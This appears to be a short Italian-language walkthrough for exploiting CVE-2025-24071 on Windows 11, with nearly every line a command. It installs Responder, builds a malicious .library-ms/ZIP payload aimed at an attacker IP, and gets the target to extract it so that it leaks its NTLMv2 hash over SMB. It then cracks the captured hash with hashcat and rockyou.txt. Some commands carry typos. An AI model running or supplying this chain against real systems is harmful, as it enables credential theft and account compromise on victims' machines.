
CVE-2025-24071: Divulgazione dell'hash NTLMv2 tramite file .library-ms
sudo apt update && sudo apt install responder -y
Avvia Responder
sudo responder -I eth0
Installa il modulo Python richiesto
pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
Questo genererà: testpayload.library-ms testpayload.zip
Trasferisci testpayload.zip sulla macchina di test Windows 11. Estrai lo ZIP usando Esplora file di Windows. Questo induce Windows a tentare di accedere al percorso SMB, divulgando l'hash NTLM.
responder -I etho0

crea il file hash,txt
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
la più comune è rockyou.txt
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
